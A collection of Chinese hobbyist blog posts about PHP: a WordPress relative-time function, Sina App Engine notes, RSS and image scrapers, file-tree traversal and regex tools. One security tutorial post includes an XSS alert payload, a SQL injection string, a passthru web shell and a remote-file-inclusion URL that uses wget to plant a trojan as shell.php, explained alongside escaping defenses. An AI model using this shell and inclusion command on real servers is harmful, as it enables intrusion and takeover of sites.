一. 代码改进：

> 先让我们一起研究一下原先的代码，貌似效率特别低，o(╯□╰)o 杯具，当时小邪滴脑袋木有转过弯来。
> 居然没有想到除法取整，愣是用循环达到除法的目的，额滴神，(PД`q。)·。'゜ 冰天雪地掩面泪奔。

foreach ($info as $val) {
	$count = 0;
	while ($inte - $val[0] > 0) {
		$inte = $inte - $val[0];
		$count++;
	}
	if ($count<>0) { $res .= $count.$val[1]; }
}
//foreach 要执行四次，因为 $info 数组的外层数组有 4 维
//如果时间差恰好为 1 天，While 要执行最少 24 次，最多 23+59+59 次
//每次 While 的时候，$count 要自加一次，$inte 要减一次
//总的来说，时间为一天的话，大概执行了 141*4 次自加和减法
//如果时间不止一天而是一年的话，就杯具了，超多 - -

> 话说 Qiqiboy 说的以前有更好的代码，小邪好像没有找到，要么是判断超多的，要么也有不少循环。
> Qiqiboy 上次说："而且你用foreach会和数组中每个数值进行比较一遍做判断，这个也可以避免"。
> 唔，关于这个问题，要么除了用超多的判断来代替循环，小邪倒是木有想到其他的可用过程。
> 所以这次依然使用循环来看看，感觉超多的判断开销其实也不小，还不如省一些代码的空间来着。

foreach ($info as $val) {
	if ($inte >= $val[0]) {
		$tmp = floor($inte/$val[0]);
		$res .= $tmp.$val[1];
		$inte = $inte - $tmp*$val[0];
	}
}
//虽然还是有 foreach 函数，不过这个提供了可定制性，具体下面有介绍
//Foreach 循环四次，每次循环进行一次判断、一次除法取整、一次减法乘法
//无论时间为多长，只会进行 4 次判断、除法、取整、减法、乘法，感觉应该蛮好的

二. WP个性化评论时间函数 v1.01：

/* 小邪的个性化评论时间函数 v1.01 Start */
function evlos_funtime($gmto) {
	$set = 7*24*60*60; //在这里设定要个性化时间的秒数范围
	$gmt = strtotime($gmto);
	$inte = strtotime(gmdate('Y-m-j G:i:s')) - $gmt;
	$info = array(array(86400,'天'),array(3600,'小时'),array(60,'分钟'),array(1,'秒'));
	//你可以自由定制，可以去除 ,array(1,'秒') 这样就只会精确到分钟
	if ($inte <= $set) {
		foreach ($info as $val) {
			if ($inte >= $val[0]) {
				$tmp = floor($inte/$val[0]);
				$res .= $tmp.$val[1];
				$inte = $inte - $tmp*$val[0];
			}
		}
		if ($res=='') {$res='0s';}
		echo $res = '在'.$res.'之前';
	}
	else {
		echo $res = date(get_settings('date_format').' \a\t '.get_settings('time_format'),$gmt+get_settings("gmt_offset")*3600);
	}
}
/* 小邪的个性化评论时间函数 v1.01 End */

三. 关于这个函数的可定制性：

$info = array(array(86400,'天'),array(3600,'小时'),array(60,'分钟'),array(1,'秒'));
//你可以自由定制，可以去除 ,array(1,'秒') 这样就只会精确到分钟
//可以在 array(86400,'天'), 前面增加 array(604800,'周'), 来显示单位周
//还可以增加 array(2592000,'月'), 来显示单位月

//注意，单位一定要从大到小排列，不然会杯具喔 _(￣0￣)_

四. 用官方函数的超短代码：

> Human_time_diff 函数 - http://codex.wordpress.org/Function_Reference/human_time_diff

<?php echo human_time_diff(get_the_time('U'), current_time('timestamp')) . '之前'; ?>
//日志发布时间个性化
<?php echo human_time_diff(get_comment_time('U'), current_time('timestamp')) . '之前'; ?>
//评论时间个性化

//注意咯，这个函数只提供 "x分钟之前" "x小时之前" "x天之前" 的效果，木有 "x分钟x秒之前"

> 把上面的这些放到需要显示个性化时间的位置即可，具体可查看上一篇文章的方法。
> 地址 - http://www.evlos.org/2010/08/03/comments-date-style

<?php echo human_time_diff(strtotime($comment->comment_date_gmt), strtotime(gmdate('Y-m-j G:i:s'))) . '之前'; ?>
//你知道的，因为小邪VPS时间杯具事件，所以不得不绕一个大弯，o(╯□╰)o
//时间正常的童鞋请拿上面的代码，而这里的代码能在时间最杯具的时候挺住 (￣y▽￣)╭ Ohoho ..

五. 奇特的 Floor 取整函数：

$int = 9.99; echo floor($int); // returns 9
$int = 4.55555; echo floor($int); // returns 4
$int = 1.11111; echo floor($int); // returns 1
$int = 0.99999999999999999; echo floor($int); // returns 1
$int = 0.9999999999999999; echo floor($int); // returns 0
$int = -2.44; echo floor($int); // returns -3

六. 尾记：

> o(*￣▽￣*)ゞ 嘿嘿，小邪 9 号要到韩国去旅行，大概有 5 天左右，打算要去强力围观一下棒子们。

> 嘎嘎，图中，小邪灰常幸运滴抢到了几个让人喜爱的 4 位二级域名，最喜欢 Moon 的那个了。
> 既然有免费强力资源，一定要充分利用，而且小邪可以随便玩且不用担心可爱的菠萝阁超载鸟。

一. SAE 13 张图详细介绍：

01. Fetch Url：

> 嘿嘿，如果一定要使用 Curl 或者 File_get_contents 来获取资源的话，根据 SAE 文档说明。
> 仅仅只被允许获取 Sina.com.cn 域名中网站的资源，而获取其他外部资源将会产生错误提示。

02. Mail 发送：

> 为了防止新浪变成一个巨大的垃圾邮件商，所以这里是不允许直接使用 SMTP 函数来发的。
> 嗯，这里需要注册一个自己的邮箱，随便 Gmail 163 的都可以，然后用这些邮箱来发邮件。

03. Memcache：

> 呵呵，这个是内存缓存服务，可以加速资源的读取，大概每个人现在可以分到 11MB 的空间。

04. 图片修改服务：

> 这个服务也是灰常不错滴，可以水平翻转或者垂直翻转图片，当然咯，等比缩放是必不可少的。

05. 成员管理：

> 呵呵，这里呢，是可以让大家一起来管理源代码，所以只要邀请别人来参与这个列表就可以了。

06. 预定义变量：

> 预定义变量也给咱们弄得灰常清楚，嘻嘻，顺便说一下呐，$sae_ 开头的变量尽量别去用喔。

07. Mysql 数据库：

> 嘿嘿，这里可以随意地指定你的账号的权限，并且还可以使用 Phpmyadmin 来管理数据库。
> 貌似谷歌的 GAE 很难备份数据文件，不知道现在有没有改观，至少 SAE 是做得很不错的。

08. Cron jobs 定时进程：

> O(∩_∩)O 哈哈，这个是一大亮点，特别爽，到时候小邪就可以弄出很多经典的程序出来。

09. 资源配额：

> 每日的流入带宽是 500MB，流出带宽则是 1GB，小邪（¯﹃¯）口水都流出来鸟，嘻嘻嘻。
> Fetch Url 居然每天都可以用上 5W 次，小邪觉得抓取特别爽，春哥保佑，╮(╯▽╰)╭ 哈。

> 这里提供了灰常详细的图表，可以随时了解配额的情况，另外还提供了请求日志可以查询喔。

10. Wp4sae [Wordpress SAE版]：

> 嘻嘻，大亮，这个是经过修改的 WordPress 程序，可以运行在 SAE 上面喔，O(∩_∩)O。

> Google Code 的 Wp4sae 代码页面强力传送门 - http://code.google.com/p/wp4sae

11. 小邪的 SAE App（建设中）：

> [AppName] 邪罗刹的Wall -- [AppUrl 坚挺的传送门] http://wall.sinaapp.com
> [AppName] 邪罗刹的Feel -- [AppUrl 色色的传送门] http://feel.sinaapp.com
> [AppName] 邪罗刹的Moon -- [AppUrl 弱弱的传送门] http://moon.sinaapp.com
> [AppName] 邪罗刹的Soul -- [AppUrl 低调的传送门] http://soul.sinaapp.com
> [AppName] 邪罗刹的SAE -- [AppUrl 猥琐的传送门] http://evlos.sinaapp.com

> 文章与评论之间的联系，只是依靠数据库中的 Wp_comments 表内的文章 ID 字段来确定的。
> 即名称为 comment_post_ID 的字段，所以我们如果要转移某批评论，只要修改此字段即可喔。

一. 使用方法：

> 呵呵，因为小邪原先都是把不和谐的传送门地址保存为单独的页面的，但是后来发现不能分页。
> 而且为了不让这些页面显示到导航栏中去，小邪的这些页面都不得不使用 Exclude 参数来隐藏。

<?php wp_list_pages('exclude=1906,1915&title_li='); ?>

> 但是这样子数量一多起来，就麻烦啦，所以小邪就打算把它们转变成为单独的文章，放在最前。

> 使用方法很简单的喔，首先按照下面源代码处的说明，修改好必要的参数，然后运行这个程序。
> 运行的时候会提示你输入你要转移的文章 ID，和要转移到的文章 ID，然后点击提交开始读取。

> 至于获得文章 ID 的方法也很简单，在编辑文章的界面下，找到地址栏中的 post 参数值即可。
> 接着看看读取出来的评论是否正确，如果正确的话，就点击菜单栏中的 “开始” 按键开始转移。

三. 源代码：

> 源代码需要修改的地方就是这个位置咯。请把你的数据库用户名与密码，还有库名填入即可。

$info['db_host'] = 'localhost';
$info['db_user'] = 'root';
$info['db_psw'] = '890';
$info['db_dba'] = 'test';

> Update at 2010.02.06 12:12 -
> 之前下载的盆友请勿运行程序，小邪不小心造成了一个致命 BUG，现已修复，请重新下载。
> 小邪犯傻使用了 Replace 来处理转移的函数，太杯具了，弄得全站大乱，现在已经纠正鸟。

> 源码- http://code.google.com/p/evlosbox/downloads/detail?name=wpcmtmover.txt&can=2&q=

四. 菠萝阁奇趣发现：

> 突然有点儿悲哀，一切的事物都有到终点的时候，英雄迟暮，希望微软能够挺过这一劫哇。
> 原文在《译言》站点的传送门 - http://article.yeeyan.org/view/103627/76891

> ╮(╯o╰)╭，还有个视频喔，在推上面看到的，有兴趣的盆友传送 - http://u.evlos.org/gs

> Xml 函数实在弄得小邪有些头大，一时半会儿没有空去花时间看看文档，所以就正则咯。
> 其实这个程序是当初答应 菠萝 要写的，现在刚刚好小邪的 PHP 有些入门了，就去搞定它咯。

一. 程序使用介绍：

> 使用下面的代码调用即可，因为小邪输出的是 JavaScript 代码，调用很是方便呢，嘻嘻。
> Url 参数直接填域名就好，别加 http 什么的了，也别加斜杠了，小邪把程序精简一点儿。
> 所以直接加了个只允许 “A-Z a-z 0-9 - _ .” 这些字符出现在 Url 里面，应该不会很麻烦。

<script src="do.php?url=wange.im" />

> 然后程序会输出这个样子的一段代码，带链接与标题文字，并且从新窗口打开，呵呵。

document.write("<a target='_blank'
href='http://wange.im/winters-past-present-and-future.html'>
寒假的过去、现在和未来</a>");

二. 源代码：

> 把源代码保存成 Do.php 然后放到任意目录即可，嘎嘎，O(∩_∩)O 祝你玩得愉快喔。

<?php
$rssurl_save_time = '1296000';
$rsscont_save_time = '7200';
//Evlos.org application
if (!is_dir('cache')) { mkdir('cache'); }
function app_js_out($url,$cont) {
	return 'document.write("'."<a target='_blank' href='".$url."'>".$cont.'</a>");';
}
function app_html_get($url) {
	$curl = curl_init($url);
	$useragent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1)
Gecko/20061204 Firefox/2.0.0.1";
	curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
	curl_setopt ($curl,CURLOPT_USERAGENT,$useragent);
	$ret = curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
	$data = curl_exec($curl);
	curl_close($curl);
	return $data;
}
function app_get_rssurl($url) {
	$data = app_html_get($url);
	preg_match('/application\/rss\+xml\" title=\"[^\"]+\" href=\"(.*)\"/',$data,$s);
	if (preg_match('/^http.+/',$s[1])) {
		return $s[1];
	}
	else {
		return 'http://'.$url.$s[1];
	}
}
function app_websiteinfo($url) {
	$u = str_replace('.','_',$url);
	$file = './cache/rssurl_-_'.$u.'.txt';
	if (file_exists($file)||(time()-filemtime($file))<$rssurl_save_time) {
		$cont = file_get_contents($file);
		return $cont;
	}
	else {
		$rssurl = app_get_rssurl($url);
		$handle = fopen($file,'w+');
		fwrite($handle,$rssurl);
		fclose($handle);
		return $rssurl;
	}
}
function app_get_rssread($url) {
	$data = app_html_get($url);
	preg_match_all('/<title>([^<]+)<\/title>/',$data,$s);
	$rss['title'] = $s[1][1];
	preg_match_all('/<link>([^<]+)<\/link>/',$data,$c);
	$rss['link'] = $c[1][1];
	return $rss;
}
function app_rss_getnew($url,$host) {
	$u = str_replace('.','_',$host);
	$file = './cache/rssnew_-_'.$u.'.txt';
	if (file_exists($file)||(time()-filemtime($file))<$rsscont_save_time) {
		$cont = file_get_contents($file);
		$rsso = explode("||",$cont);
		$rssc['title'] = $rsso[0];
		$rssc['link'] = $rsso[1];
		return $rssc;
	}
	else {
		$rssc = app_get_rssread($url);
		$handle = fopen($file,'w+');
		fwrite($handle,$rssc['title'].'||'.$rssc['link']);
		fclose($handle);
		return $rssc;
	}
}
if (isset($_GET['url'])) {
	$url = $_GET['url'];
	if (!preg_match('/^[a-zA-z0-9_\.-]+$/',$url)) {
		echo app_js_out('','Error');
	}
	else {
		$feedurl = app_websiteinfo($url);
		$rssc = app_rss_getnew($feedurl,$url);
		echo app_js_out($rssc['link'],$rssc['title']);
	}
}
else {
	echo app_js_out('','Error');
}
//Evlos.org application
?>

三. 附言：

> 有朋友用过 HTC Hero 吗？有啥感想没有，小邪觉得 5310xm 太杯具鸟，所以打算换一换。

> 与更强力的 Glob() 函数，作用是以数组的形式返回与指定模式相匹配的文件名或目录。
> 友情提醒，千万别像小邪那样在电脑前面呆太长时间，否则就会像小邪一样得见鬼的高血糖。

一. 遍历单层文件夹：

> 在扫描单层文件夹的问题是，两个函数的结果虽有不同，不过表现是相差不大的。
> Scandir 函数会提供额外两行，分别是 “.” 和 “..” ，而 Glob 则是没有的。

function get_dir_scandir(){
	$tree = array();
	foreach(scandir('./') as $single){
		echo $single."<br/>\r\n";
	}
}
get_dir_scandir();

function get_dir_glob(){
	$tree = array();
	foreach(glob('./*') as $single){
		echo $single."<br/>\r\n";
	}
}
get_dir_glob();

二. 递归遍历文件树：

> 在递归扫描文件夹树的问题上，还是 Glob 函数的表现好一点，很准确的说。
> Scandir 函数会莫名其妙扫描两次 ../ 处的文件，也就是说如果小邪有俩文件。
> ../b.php 和 ../a.php，结果就会在扫描报告上面出现两次，很是奇怪。

//Update at 2010.07.25 - 以下代码作废
$path = '..';
function get_filetree_scandir($path){
	$tree = array();
	foreach(scandir($path) as $single){
		if(is_dir('../'.$single)){
			$tree = array_merge($tree,get_filetree($single));
		}
		else{
			$tree[] = '../'.$single;
		}
	}
	return $tree;
}
print_r(get_filetree_scandir($path));

//Update at 2010.07.25 - 以下为新代码
$path = './';
function get_filetree_scandir($path){
	$result = array();
	$temp = array();
	if (!is_dir($path)||!is_readable($path)) return null; //检测目录有效性
	$allfiles = scandir($path); //获取目录下所有文件与文件夹
	foreach ($allfiles as $filename) { //遍历一遍目录下的文件与文件夹
		if (in_array($filename,array('.','..'))) continue; //无视 . 与 ..
		$fullname = $path.'/'.$filename; //得到完整文件路径
		if (is_dir($fullname)) { //是目录的话继续递归
			$result[$filename] = get_filetree_scandir($fullname); //递归开始
		}
		else {
			$temp[] = $filename; //如果是文件，就存入数组
		}
	}
	foreach ($temp as $tmp) { //把临时数组的内容存入保存结果的数组
		$result[] = $tmp; //这样可以让文件夹排前面，文件在后面
	}
	return $result;
}
print_r(get_filetree_scandir($path));

> Glob 函数扫描灰常准确，并且会自动按照字母排好顺序，貌似是最佳方案。

$path = '..';
function get_filetree($path){
	$tree = array();
	foreach(glob($path.'/*') as $single){
		if(is_dir($single)){
			$tree = array_merge($tree,get_filetree($single));
		}
		else{
			$tree[] = $single;
		}
	}
	return $tree;
}
print_r(get_filetree($path));

三. 附言：

> 嘻嘻，小邪这里开始不和谐了，欢迎来墙。今天服务器很是不稳定呐，不知道怎么回事。
> 据戈戈说貌似是线路不稳定，难道 G.fw 又开始乱搞了？！小邪是翻墙才写好文章的。

> 额，小邪今天去了下医院，无语，血糖指数竟然到正常人的三倍鸟，貌似快挂鸟，阿门。
> 所以上午去了做饭前检查，下午又去做了饭后检查，结果昨天就没来得及写一下文章。

> 程序的运行过程是这个样子的，先读取相册页面，然后用正则式找到文件名与地址。
> 最后用 set_time_limit(0) 设置防止超时，并用 File_get_contents 函数把图片下载下来。

一. PBK Downloader 程序简介：

> 在变量 album_url 里填上相册地址，然后在变量 album_pagen 里填上页数即可。
> 程序会自动生成一个 Img 文件夹，并将图片下载到里面，就完成咯，O(∩_∩)O 嘻嘻！

$album_url = 'http://photobucket.com/images/avatar%20movie/'; //相册
$album_pagen = 1; //页数

二. 抓取实例：

> 相册地址 - http://photobucket.com/images/avatar%20movie/

> 呵呵，小邪在页数那里只填了1页，然后就抓取下来咯。小邪文件名前面加了序号来着。
> 因为有些图片名字相同，但是内容却是不同的，所以这样子防止出现漏掉文件。

三. 源代码：

> 把下面两个变量填一下就好，小邪已经把超时设置为无限，但是如果出现意外状况。
> 直接刷新接着来就好，程序如果发现已经下载了就不会下第二遍咯，O(∩_∩)O。

> http://code.google.com/p/evlosbox/downloads/detail?name=pbk_getpic.txt

> 最近又出现了 Phpwind 的几个漏洞，WP2.7 也有出现漏洞，QQMail 也出现XSS。
> P.s. 最近看了《神话》，吕素居然就这样挂了，杯具啊杯具，受不鸟，都不想继续看了。

一. PHP的一些安全要点：

1. 表单数据转意：

> 一般来说，我们如果需要输出获取到的表单数据，输出之前一定要记得转义才好。
> 如果没有转义的话，就会出现漏洞，比如XSS。假设有一个未进行转义的留言本程序。
> 我们在一个输入框中写入以下的代码，代码是JS的一个警告窗口弹出效果。

<script>alert('站点已被占领 by XXX黑客团队')</script>

> 这样当大家浏览到这个留言本页面的时候就会弹出一个灰常简单又牛叉的窗口，哈哈。
> 比如下面这个是人民网微博闹出来的一个大乌龙，人民微博一上线就被群体爆菊了。

> 所以，我们需要将 "< " ">" 等一些被执行的入侵代码中包含的字符进行转义。
> 所以我们就需要用到函数 htmlspecialchars，很帅的函数 O(∩_∩)O。
> 这个函数会影响到的字符如下，这样子处理就可以正常查看而且不会被执行啦。

> 1 - & （和号） 成为 &
> 2 - " （双引号） 成为 "
> 3 - ' （单引号） 成为 '
> 4 - < （小于） 成为 &lt;
> 5 - > （大于） 成为 &gt;

> 1 - ENT_COMPAT - 默认。仅编码双引号
> 2 - ENT_QUOTES - 编码双引号和单引号
> 3 - ENT_NOQUOTES - 不编码任何引号

//嘻嘻，用法就应该像下面这个样子呢。
echo htmlspecialchars($_GET['psw'], ENT_QUOTES);

2. 远程包含漏洞：

> 远程包含漏洞出现在 include() require() include_once() require_once() 中。
> 因为这几个函数是可以像下面这个例子一样执行代码的，灰常牛叉的一种功能。

> 这是一个 Phpwind 爆出的漏洞，文件在 apps/groups/index.php。
> 而出现的原因则是变量未初始化，$route 和 $basePath 都没有初始化。

<?php
if ($route == "groups") {
require_once $basePath . '/action/m_groups.php';
} elseif ($route == "group") {
require_once $basePath . '/action/m_group.php';
} elseif ($route == "galbum") {
require_once $basePath . '/action/m_galbum.php';
}

> 我们影响变量的值使其包含 http://www.evlos.org/action/m_galbum.php。
> 一般来说远程包含PHP文件是需要不支持PHP的空间的，因为支持的话就会包含失败。
> 也就是说，如果可以的话，远程包含一般是包含 m_galbum.txt 这样的文件。
> 所以不支持PHP的空间显示PHP文件的时候，会直接显示源代码的，就等同于文本。

3. 如何利用远程包含漏洞：

> 简单举一个例子，我们把下面的文件保存为 command.txt 文件假设地址如下。
> 类型为纯文本即可。http://tool.evlos.org/file/command.txt。

<?php
if (get_magic_quotes_gpc()) {
  $_REQUEST["cmd"]=stripslashes($_REQUEST["cmd"]);
}
ini_set("max_execution_time",0);
passthru($_REQUEST["cmd"]);
?>

> 假设出现漏洞的文件是这个傻傻的样子，代码如下，O(∩_∩)O 嘎嘎。
> 同时假设地址为 - http://tool.evlos.org/file/index.php。

<?php
  include $_GET['test'];
?>

> 假设木马地址为 - http://tool.evlos.org/file/mm.txt
> 在 Linux 主机上面我们就可以在地址栏输入以下代码将木马传到目标主机上。

http://tool.evlos.org/file/index.php?test=
http://tool.evlos.org/file/command.txt?cmd=
wget http://tool.evlos.org/file/mm.txt -O shell.php

4. SQL 输入转义：

> 过滤了 $_GET $_POST $_COOKIE 几个常见的输入来源之后。
> 我们也要用 mysql_real_escape_string 函数来保护 Mysql 数据库。
> 这是一个简单的防注入技巧，代码如下，这个样子就可以咯。

<?php
$sqlc = "UPDATE users SET
  name='.mysql_real_escape_string($user).'
  WHERE id='.mysql_real_escape_string($id).'";
mysql_query($sqlc);
?>
//受影响的字符　\x00　\n　\r　\　'　"　\x1a

> 假设未进行保护，那么就会有可能出现最熟悉的 “or=” Mysql 注入漏洞了。

<?php
mysql_connect("localhost", "hello", "321");
$sql = "SELECT * FROM users
WHERE user='{$_POST['user']}'
AND password='{$_POST['pwd']}'";
mysql_query($sql);

// 假设传输过来的数据像下面这个样子。
// $_POST['user'] = 'john';
// $_POST['pwd'] = "' OR ''='";
?>

二. 睡觉去咯：

> 今天看到一个阿三的演讲，描绘了虚拟现实世界结合的完美生活，灰常鸡冻。
> 开一个叫兽处的传送门 - http://www.chunbaba.net/blog/?p=554

> Phpwind 7.5 的漏洞和 WordPress 2.7 的漏洞，它们的详细信息在这里。
> 开俩传送门 - http://www.80vul.com/pwvul/phpwind.txt
> 还有WP的门 - http://www.80vul.com/exp/wordpress.txt

> 最近搜狐上线的搜搜舞文弄墨服务，可以生成藏头诗和层层递进的诗，嘿嘿嘿。
> 传送门 - http://labs.soso.com/app.q?app=makepoem

> 好咯，小邪就讲解到这里了，好多童鞋都觉得小邪的文章太长了呢。
> 所以小邪以后会尽量短小精悍一点，囧，貌似这篇文章还是有点长。
> 那么祝愿有兴趣阅读的盆友坚挺一点儿，小邪又要去睡觉罗 Zzzz 晚安呐。

> 那么，在这里小邪就讲解一下如何使用 PHP 的 CURL 函数和正则式抓取 Flickr 的图片。
> 首先用 Curl 带 Cookies 地抓页面代码，然后用正则分离出图片Code，最后得到大尺寸地址。

> Rencently, Evlos prepare to change the image urls in my article to the image urls in Flickr.
> So, I think I should use php program to catch urls in Flickr for saving time.
> Um .. Just for saving time, curl isn't a good tools for lots of people.
> Because it can get the whole data in website and make a mirror site for gaining money.
> And I suffered this last month, it's a tragedy.

> First of all, use curl get the html data. We should post some cookies in same time.
> Then use regex to get the code for images. At last, we use image code to get image url.

一. 分析一下地址 Analyse url：

1. 用户地址 User url -

> http://www.flickr.com/photos/46051661@N04
> 比如小邪的用户地址就是这个样子的，很规则，处理有规则的东西是最方便的鸟。

> For example, this is my album url. It's very regular and can easy to deal with it.

2. 相片集地址 Album url -

> http://www.flickr.com/photos/46051661@N04/sets/72157623167782492
> 恩恩，后面是一个 Sets 表示相片集，然后是相片集本身的 Code。
> 小邪喜欢把这些唯一性的字符称为 Code，呵呵，这样比较好说一点儿。

> Um .. It contains a sets code rearward and a user code in der mitte.
> Evlos like called the unique character as code. Haha, it's easily explained.

3. 单张相片地址 Single image url -

> http://www.flickr.com/photos/46051661@N04/4259923860/
> http://www.flickr.com/photos/46051661@N04/4259923860/in/set-72157623167782492
> 嘎嘎，有两种，其实都是一模一样的页面来着，所以咱挑上面的短的。

> , Flickr offer two kinds of url, but it will heading us to a same page.
> So, certainly, we choose the shorter url.

4. 单张相片大尺寸地址 Single image url for big size -

> http://www.flickr.com/photos/46051661@N04/4259923860/sizes/o/
> 一般来说小邪的 600px 宽度，高度在 600px 以下的，都用地址 O 来查看全图的。
> http://www.flickr.com/photos/46051661@N04/4259923860/sizes/l/
> 因为 Flickr 不提供大图全图，而 L 是图片尺寸过大后被裁减的地址，所以只好用 L 咯。
> 嘎嘎，还有四个尺寸，依次减小，这样子 - M S T SQ，OK可以开工了。

> In general, my image is limit in 600px and i can get the full size by "o".
> Bacause Flickr limit the size of image by 1024px for free users.
> And "L" is a code for the image exceed 1024px and offer 1024px image.
> Haha, and the remaining four size. Like M S T SQ, so let's beginning.

二. 开始抓取 Begin to catch：

1. 抓取相片 Code 代码 Catch the code of image：

> $sa[0] 里面储存的是相片的 Code，$sa[1] 储存的是相片的标题。
> 而 $sa[2][0] 储存的是相片个数，因为这里是二维数组，小邪不想要 Foreach。
> 虽然双层 Foreach 可以遍历二维数组，不过这里只需要作为两个一维数组就好。

> Put the codes of image in $sa[0]. And put the title of image in $sa[1].
> And put the numbers of images into $sa[2][0], bacause it's 2d array.
> And Evlos don't want to use foreach. Though i can use double-layer foreach.
> I just need to use two 1d array, it's enough.

function app_get_set_info($data) {
	$regex = "%\/photos\/46051661@N04\/(\d+)\/in\/set\-\d+\/\"
title=\"([a-z0-9A-Z-_]*)\" class%i";
	preg_match_all($regex,$data,$save);
	$sa[0] = $save[1];
	$sa[1] = $save[2];
	$sa[2][0] = array_count($save[1]);
	return $sa;
}

> $save[1] 是储存第一个括号中匹配内容的数组，而 $save[2] 则是第二个括号的。
> 那么还有一个，是 $save[0]，这个当然就是整串正则式匹配的字符咯，O(∩_∩)O。

> We put the content in firstly bracket into $save[1].
> And the same meaning to content in secendly bracket.
> So, the $save[0] is use to putting the whole content that get by regex.

2. 抓取图片地址：

> 恩，这里整个页面也就一张 JPG 或者 PNG 的大图了（页面元素是 GIF）。
> 所以咱们这样子抓下来。╮(╯▽╰)╭，可怜的 Flickr，被偶剥得半裸了。
> 嘎嘎，差不多就 619 那根全裸男一样了（619 童鞋一定要小邪给他开个裸奔帝国传送门）。

> Um .. The whole image page is just include one jpg or one png url.
> So we can easily get it by regex like the following content.

function app_get_ourl($data) {
	$pagelist_regex = "%<img src=\"(.+.jpg)\"%i";
	preg_match_all($pagelist_regex,$data,$save);
	//print_r($save);
	if (!isset($save[1][0])) {
		$pagelist_regex = "%<img src=\"(.+.png)\"%i";
		preg_match_all($pagelist_regex,$data,$save);
	}
	return $save[1];
}

3. 带 Cookies 的 Curl：

> 因为登陆后在相片集页面可以看到全部照片，所以咱们用 Curl 把 Cookies 传过去。
> 嘎嘎，老样子，大家都喜欢模拟 FF 的访问头部。然后是一些必要的参数。

> Because if we login, we can see the all images in set page.
> So we post the cookies to Flickr, and get the html code.
> Haha .. Same as ever, we like simulate the header of firefox.

function app_get_html($url,$cookie='') {
	$curl = curl_init($url);
	$useragent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;
rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1";
	curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
	curl_setopt ($curl, CURLOPT_USERAGENT, $useragent);
	if ($cookie<>'') {
		curl_setopt ($curl, CURLOPT_COOKIE, $cookie);
	}
	$data = curl_exec($curl);
	curl_close($curl);
	return $data;
}
// 用法如下，Cookies 信息麻烦自行找到，小邪太懒了╮(╯▽╰)╭。
// The example method like the following content. Please get the cookies by yourself.
app_get_html('http://www.flickr.com/photos/46051661@N04/sets/72157623167782492',
$cookie='cookie_accid=16212532;cookie_epass=816e23c7b24aa6q9f13713e7503de07f;')

4. 程序运行过程 The process of running：

> 首先麻烦自行搞到 Flickr 的 Cookies，然后把相片集页面包含的相片 Code 全部抓取来。
> 保存到数据库之类的地方（因为咱们可能会经常超时），一条一条读取数据库中保存的 Code。

> 然后获取图片页面中的 Url，保存到数据库，如果 Url 已经储存就不去抓取了。
> 因为 100% 会出现超时，所以得这样，然后到时候刷新下接着干就好了，嘿嘿。

> 请原谅小邪没有把完整源代码贴出来，因为怕引起 Flickr 官方的注意，虽然可能性不会很大。
> 但是还是小心一点儿为好。而且全部的主要代码已经贴出来了，储存数据库相信你能搞定的。
> 呵呵，时间又到两点多钟了，小邪很想睡觉鸟 Zzzzzzzzzz 晚安喔，小邪这就去把床给上了。

> First of all, get the cookies for yourself. Then get the codes for images.
> Save them into database or something like that. And read data one by one.

> Get the url for single image file and save to db, if it's exist, just skip up.
> Beacuse we will reach the time excceed. So just need to refresh the page.

三. 这难道是水军路过？！：

> 截图留念，╮(╯▽╰)╭，人家都是拍照留念，但小邪没事最喜欢截图留念了。

> 因为国内网上的正则式教程十分紧缺，只能找到少量的教程，有时候很难学习全面。
> 所以小邪也只能按照自己多次的测试得出的结果来稍微讲解一下呢，能学多少就看你的咯。

一. 有关正则式的函数分类：

> 正则表达式函数库（Perl 兼容）-

> preg_grep -- 返回与模式匹配的数组单元
> preg_match_all -- 进行全局正则表达式匹配
> preg_match -- 进行正则表达式匹配
> preg_quote -- 转义正则表达式字符
> preg_replace_callback -- 用回调函数执行正则表达式的搜索和替换
> preg_replace -- 执行正则表达式的搜索和替换
> preg_split -- 用正则表达式分割字符串

> 正则表达式函数库（POSIX 扩展）-

> ereg_replace -- 替换正则表达式
> ereg -- 正则表达式匹配
> eregi_replace -- 不区分大小写替换正则表达式
> eregi -- 不区分大小写的正则表达式匹配
> split -- 用正则表达式将字符串分割到数组中
> spliti -- 用正则表达式不区分大小写将字符串分割到数组中
> sql_regcase -- 产生用于不区分大小的匹配的正则表达式

> 这两组函数库提供了对 POSIX 和 PERL 两种风格的正则表达式的支持。
> 区别不大，PERL 的表达式两边要加上 “/”，而且据说 PERL 运行效率高一点。

二. 程序运行LOG日志记录：

> 呵呵，这个是程序运行的时候会陆续输出的运行记录，方便检查。
> 第一次运行的时候像下面这样，然后刷新，被替换和替换为的数据会变成相同的。
> 这样就表示替换成功了，恭喜发财，嘿嘿嘿 O(∩_∩)O。

Post Id => 1864
//正在被替换的数据库中文章的ID
<img src="http://www.evlos.org/uploads/1451_020.jpg"
 class="alignnone" width="600" height="437" />
//在数据库中的文章表里面查找到的IMG标签
<img src="http://www.evlos.org/uploads/1451_020.jpg" />
//将要被替换成为的精简过的IMG标签
ID Count : 1
//此文章中的图片数量统计
Success ~!
//成功更新了Mysql数据库中的数据

Post Id => 1875
<img src="http://www.evlos.org/uploads/1451_031.jpg"
 class="alignnone" width="600" height="235" />
<img src="http://www.evlos.org/uploads/1451_031.jpg" />
<img src="http://www.evlos.org/uploads/1451_030.jpg"
 class="alignnone" width="600" height="156" />
<img src="http://www.evlos.org/uploads/1451_030.jpg" />
<img src="http://www.evlos.org/uploads/1451_031.jpg"
 class="alignnone" width="600" height="235" />
<img src="http://www.evlos.org/uploads/1451_031.jpg" />
<img src="http://www.evlos.org/uploads/1451_028.jpg"
 class="alignnone" width="600" height="186" />
<img src="http://www.evlos.org/uploads/1451_028.jpg" />
<img src="http://www.evlos.org/uploads/1451_029.jpg"
 class="alignnone" width="600" height="246" />
<img src="http://www.evlos.org/uploads/1451_029.jpg" />
ID Count : 5
Success ~!

-------------------
Count : 296 //整个WP_posts表中，所有的的图片总数

三. 程序源代码：

> 以下内容保存为任意名称的 PHP 文件，填好配置，运行即可。

<?php
$sqlc_host = "localhost"; //Mysql服务器地址
$sqlc_user = ""; //用户名
$sqlc_psw = ""; //密码
$sqlc_dba = "wordpress"; //数据库名
echo '<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
